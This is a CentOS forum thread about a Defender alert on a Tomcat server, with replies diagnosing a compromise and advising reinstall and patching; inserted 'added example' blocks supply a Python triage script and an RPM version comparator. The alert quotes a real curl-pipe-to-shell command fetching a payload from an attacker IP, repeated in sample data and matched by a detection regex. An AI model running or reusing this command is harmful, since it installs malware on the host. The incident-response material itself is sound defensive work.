Suspicious process executed by a network service

Support for security such as Firewalls and securing linux
toranv
Posts: 2
Joined: 2024/01/17 05:12:10

Suspicious process executed by a network service

Post by toranv » 2024/01/17 07:13:16

Hello community members,

I am an Azure consultant and I have a customer who is getting high severity "Suspicious process executed by a network service" Microsoft defender for cloud alert.

Environment: The customer has an Apache Tomcat webserver running on CentOS 7.9

We downloaded the Defender report, which reads as follows:

[7402] java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.security.egd=file:///dev/urandom -Djava.awt.headless=true -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Xms512M -Xmx1024M -server -XX:+UseParallelGC -Dignore.endorsed.dirs= -classpath /opt/tomcat/bin/bootstrap.jar:/opt/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat -Dcatalina.home=/opt/tomcat -Djava.io.tmpdir=/opt/tomcat/temp org.apache.catalina.startup.Bootstrap start
Command line /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.372.b07-1.el7_9.x86_64/jre//bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.security.egd=file:///dev/urandom -Djava.awt.headless=true -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Xms512M -Xmx1024M -server -XX:+UseParallelGC -Dignore.endorsed.dirs= -classpath /opt/tomcat/bin/bootstrap.jar:/opt/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat -Dcatalina.home=/opt/tomcat -Djava.io.tmpdir=/opt/tomcat/temp org.apache.catalina.startup.Bootstrap start
Process id 7402
Image file path /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.372.b07-1.el7_9.x86_64/jre/bin/java
Image file SHA1 2bffb1d3d46365ca0e78f96577123814b54dbe88
Image file last modification time May 15, 2023 8:25:05 PM
Image file java
Effective user tomcat
1/6/2024 9:11:14 PM
[7402] bash /bin/sh -c "cd / ;curl -fsSL http://222.108.161.27:7070/docs/da.txt |sh"
Command line /bin/sh -c "cd / ;curl -fsSL http://222.108.161.27:7070/docs/da.txt |sh"
Process id 7402
Image file path /usr/bin/bash
Image file SHA1 9ad737cbd8bbdddc96726156dbd3bc03936bf02f
Image file last modification time Nov 24, 2021 10:03:27 PM
Mitre techniques T1505: Server Software Component, T1059: Command and Scripting Interpreter, T1059.004: Unix Shell, T1505.003: Web Shell, T1190: Exploit Public-Facing Application
Image file bash
Effective user tomcat
Referenced in commandline http://222.108.161.27:7070/docs/da.txt
Referenced in commandline 222.108.161.27


I need help identifying what is happening here. Is the process running within the Tomcat web server or outside the Tomcat web server (over the public IP)?
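
The question in the post (inside Tomcat or from outside?) is answered by the process relationships in the alert: the shell runs as the effective user tomcat, the account the JVM runs as, and it is listed beneath the Java process, so the command was launched from within the Tomcat process tree rather than by a login from outside. The following is an added example, not part of this post or of Defender for Cloud: it applies that reasoning to constructed process-creation events (made-up pids, a shortened JVM path, and the RFC 5737 documentation address 203.0.113.10 in place of the real download host), and the scoring rules, service-account list and thresholds are this example's own assumptions, not Microsoft's.

```python
"""Triage of process-creation events for a shell spawned by a network service.
Added example: the events below are constructed to mirror the shape of the
alert in the thread; the rules and thresholds are this example's own assumptions."""
import os
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str
    user: str       # effective user


@dataclass
class Finding:
    pid: int
    severity: str
    origin: str
    reasons: List[str] = field(default_factory=list)
    ancestry: List[int] = field(default_factory=list)   # pid, parent, grandparent, ...
    iocs: List[str] = field(default_factory=list)


# Executables (by basename) that are network-facing services (assumed list).
SERVICE_IMAGES = {"java", "httpd", "nginx", "php-fpm", "node"}
# Accounts that such services normally run as (assumed list).
SERVICE_USERS = {"tomcat", "apache", "www-data", "nginx", "httpd"}
SHELL_IMAGES = {"sh", "bash", "dash", "zsh", "ksh"}

# `curl ... | sh` / `wget ... | bash`: download-and-execute in one command line.
REMOTE_PIPE_RE = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba|da|z|k)?sh\b")
URL_RE = re.compile(r"https?://[^\s\"'|;]+")
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# Constructed sample data. 203.0.113.10 is a documentation address (RFC 5737)
# standing in for the real download host in the alert; pids are invented.
SAMPLE_EVENTS = [
    ProcEvent(7402, 1, "/usr/lib/jvm/jre/bin/java",
              "java -Dcatalina.base=/opt/tomcat org.apache.catalina.startup.Bootstrap start", "tomcat"),
    ProcEvent(7555, 7402, "/usr/bin/bash",
              '/bin/sh -c "cd / ;curl -fsSL http://203.0.113.10:7070/docs/da.txt |sh"', "tomcat"),
    ProcEvent(7600, 7402, "/usr/bin/bash",
              '/bin/sh -c "/opt/tomcat/bin/version.sh"', "tomcat"),
    ProcEvent(8001, 2000, "/usr/bin/bash",
              'bash -c "curl -fsSL https://get.example.invalid/install.sh | sh"', "admin"),
]


def _ancestry(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[int]:
    """Walk ppid links as far as the event set allows (stops at unknown pids or loops)."""
    chain, seen, cur = [ev.pid], {ev.pid}, ev
    while cur.ppid in by_pid and cur.ppid not in seen:
        cur = by_pid[cur.ppid]
        chain.append(cur.pid)
        seen.add(cur.pid)
    return chain


def analyze(events: List[ProcEvent]) -> List[Finding]:
    """Score every shell process: who spawned it, as which account, and what it ran."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if os.path.basename(ev.image) not in SHELL_IMAGES:
            continue
        parent: Optional[ProcEvent] = by_pid.get(ev.ppid)
        from_service = parent is not None and os.path.basename(parent.image) in SERVICE_IMAGES
        score, reasons = 0, []
        if from_service:
            score += 2
            reasons.append(f"spawned by network service pid {parent.pid} ({os.path.basename(parent.image)})")
        if ev.user in SERVICE_USERS:
            score += 1
            reasons.append(f"runs as service account '{ev.user}'")
        if REMOTE_PIPE_RE.search(ev.cmdline):
            score += 2
            reasons.append("fetches a remote script and pipes it into a shell (T1059.004)")
        if score < 2:
            continue
        severity = "high" if score >= 4 else "medium"
        origin = ("inside the web server process tree: the request that triggered it reached "
                  "the application (web shell or exploited app, T1505.003 / T1190)"
                  if from_service else "outside any network service; check the parent process")
        iocs = sorted(set(URL_RE.findall(ev.cmdline)) | set(IP_RE.findall(ev.cmdline)))
        findings.append(Finding(ev.pid, severity, origin, reasons, _ancestry(ev, by_pid), iocs))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"pid {f.pid} [{f.severity}] ancestry={f.ancestry} origin: {f.origin}")
        for r in f.reasons:
            print("   -", r)
        if f.iocs:
            print("   iocs:", ", ".join(f.iocs))
```

Run against the constructed events, the curl-pipe shell under the Java process comes out as high with ancestry [7555, 7402] and the URL and IP as IoCs; a shell child of Tomcat that runs a local script is still flagged (a web server normally has no reason to spawn shells), and an admin's curl-pipe from an unrelated parent is flagged for the download-and-execute pattern but attributed to "outside any network service". The ancestry walk is what distinguishes "inside Tomcat" from "over the public IP": a web server cannot launch a shell on its own, so a shell whose parent is the JVM means code running in the application did it.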

TrevorH
Site Admin
Posts: 33221
Joined: 2009/09/24 10:40:56
Location: Brighton, UK

Re: Suspicious process executed by a network service

Post by TrevorH » 2024/01/17 12:14:13

That does indeed look very suspicious. The 222 ip address is in whois as belonging to Korea Telecom and if you download the link it is fetching that is quite clearly up to no good. It's a shell script that attempts to kill a bunch of running processes and removes things from crontab then downloads something from pastebin and adds the resulting executable to crontab to run every 10 minutes. Generally, it screams "malware".

Your java version /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.372.b07-1.el7_9.x86_64/jre/bin/java is out of date, current version is 1:1.8.0.392.b08-2.el7_9 though I have no idea if the older version is compromisable and the cause of this. The rpm changelog for the newer version (rpm -q --changelog java-1.8.0-openjdk-headless.x86_64) contains the following line:

- ** This tarball is embargoed until 2023-10-17 @ 1pm PT. **

which implies that the release was to fix an embargoed security vulnerability. There was another security update in 1.8.0.382.b05-1 which is also not on your system.

I'd say at this point your system is probably hopelessly compromised and you should reinstall from scratch to make sure there are no malware components.
The future appears to be RHEL or Debian. I think I'm going Debian.
Info for USB installs on http://wiki.centos.org/HowTos/InstallFromUSBkey
CentOS 5 and 6 are deadest, do not use them.
Use the FAQ Luke
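
The comparison made above, installed build against the later builds that carried security fixes, is an RPM version comparison, which is not a plain string comparison: segments are compared numerically, a '~' marks a pre-release, and the epoch outranks version and release. The following is an added example, not part of this post or of the rpm project: a Python re-implementation of rpm's rpmvercmp segment rules (the '^' caret is not handled) applied to the version strings quoted in the thread. The installed string is taken from the JVM path in the alert, which carries no package epoch, and 1.8.0.382.b05-1 is written as the post gives it, also without an epoch; on a real host, query the full value with `rpm -q --qf '%{EPOCH}:%{VERSION}-%{RELEASE}\n' java-1.8.0-openjdk-headless` so that both sides of the comparison carry the same epoch.

```python
"""Compare RPM epoch:version-release strings the way rpm does.
Added example: a Python re-implementation of rpmvercmp's segment rules
(no support for the '^' caret), not part of the thread or of rpm itself."""
import re
from typing import List, Tuple

# A version string is read as digit runs, letter runs and '~'; everything else is a separator.
_SEG_RE = re.compile(r"[0-9]+|[A-Za-z]+|~")


def rpmvercmp(a: str, b: str) -> int:
    """Return -1, 0 or 1 for a < b, a == b, a > b, using rpm's rules:
    numeric segments compare as numbers, a numeric segment beats an alphabetic one,
    '~' sorts before everything (pre-release), a trailing alpha segment makes a version older."""
    if a == b:
        return 0
    sa, sb = _SEG_RE.findall(a), _SEG_RE.findall(b)
    while sa and sb:
        x, y = sa.pop(0), sb.pop(0)
        if x == "~" or y == "~":
            if x != y:
                return -1 if x == "~" else 1
            continue
        if x.isdigit() != y.isdigit():
            return 1 if x.isdigit() else -1
        if x.isdigit():
            x, y = x.lstrip("0"), y.lstrip("0")   # compare as numbers: longer run is larger
            if len(x) != len(y):
                return 1 if len(x) > len(y) else -1
        if x != y:
            return 1 if x > y else -1
    rest = sa or sb
    if not rest:
        return 0
    # Leftover on one side only: '~' or letters make that side older, digits make it newer.
    rest_is_older = rest[0] == "~" or rest[0].isalpha()
    if rest is sa:
        return -1 if rest_is_older else 1
    return 1 if rest_is_older else -1


def parse_evr(evr: str) -> Tuple[str, str, str]:
    """'1:1.8.0.392.b08-2.el7_9' -> ('1', '1.8.0.392.b08', '2.el7_9'); epoch defaults to '0'."""
    epoch = "0"
    if ":" in evr:
        epoch, evr = evr.split(":", 1)
    version, _, release = evr.partition("-")
    return epoch, version, release


def evrcmp(a: str, b: str) -> int:
    """Epoch first, then version, then release; the release is only compared when both have one."""
    ea, va, ra = parse_evr(a)
    eb, vb, rb = parse_evr(b)
    rc = rpmvercmp(ea, eb) or rpmvercmp(va, vb)
    if rc == 0 and ra and rb:
        rc = rpmvercmp(ra, rb)
    return rc


# Values quoted in the thread. The installed string comes from the JVM path in the
# alert (no epoch); the fixed builds are written as the post gives them.
INSTALLED = "1.8.0.372.b07-1.el7_9"
SECURITY_FIXES = ["1.8.0.382.b05-1", "1:1.8.0.392.b08-2.el7_9"]


def missing_fixes(installed: str, fixed_in: List[str]) -> List[str]:
    """Security-fix builds that are newer than the installed one."""
    return [f for f in fixed_in if evrcmp(installed, f) < 0]


if __name__ == "__main__":
    for fix in missing_fixes(INSTALLED, SECURITY_FIXES):
        print(f"installed {INSTALLED} predates security build {fix}")
```

For the strings in the thread both fixed builds come out newer than the installed one. The epoch caveat matters in practice: had the installed side been written with its real epoch and the 382 build without one, the comparison would wrongly call the installed package newer, which is why the check should always be fed values printed by rpm itself rather than versions read from a file path.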

toranv
Posts: 2
Joined: 2024/01/17 05:12:10

Re: Suspicious process executed by a network service

Post by toranv » 2024/01/19 07:26:27

Hi @TrevorH,

Thank you for this information.

Is there any way to remove Malware from this machine (CentOS) instead of reinstalling it from scratch? And how to protect the system from Malware in the future?

jlehtone
Posts: 4532
Joined: 2007/12/11 08:17:33
Location: Finland

Re: Suspicious process executed by a network service

Post by jlehtone » 2024/01/19 08:57:48

toranv wrote (2024/01/19 07:26:27):
    Is there any way to remove Malware from this machine (CentOS) instead of reinstalling it from scratch?

You don't know which system files have been modified, so you must assume that all the tools that you would use to inspect the system have been modified to hide the fact that there are modified system files. Therefore the clean install is the only option.

A system has essentially three parts:
* Installed system files
* Configuration
* User data

There are now configuration management systems, like Ansible, for which you describe the desired configuration, and the tool sets up the system according to the description. The list of installed system files, the list of installed packages, is essentially configuration too.

A good part is that the description can be stored and updated outside of the managed system. That way it is available for easy install of "new" systems.

One should always have valid backups of the user data.

TrevorH
Site Admin
Posts: 33221
Joined: 2009/09/24 10:40:56
Location: Brighton, UK

Re: Suspicious process executed by a network service

Post by TrevorH » 2024/01/19 18:21:03

toranv wrote:
    Is there any way to remove Malware from this machine (CentOS) instead of reinstalling it from scratch? And how to protect the system from Malware in the future?

Once a system is compromised you have no idea what the attackers have done to it or what backdoors they have installed to regain access if you attempt to clean up. You could play whack-a-mole with them and attempt to get rid of them but ultimately you cannot trust the system any more so a reinstall is by far the best and most secure thing to do.

Keep the system up to date. The version of java there is coming on for a year old which means you're not running yum update on a regular basis or keeping an eye on the security updates that are released.
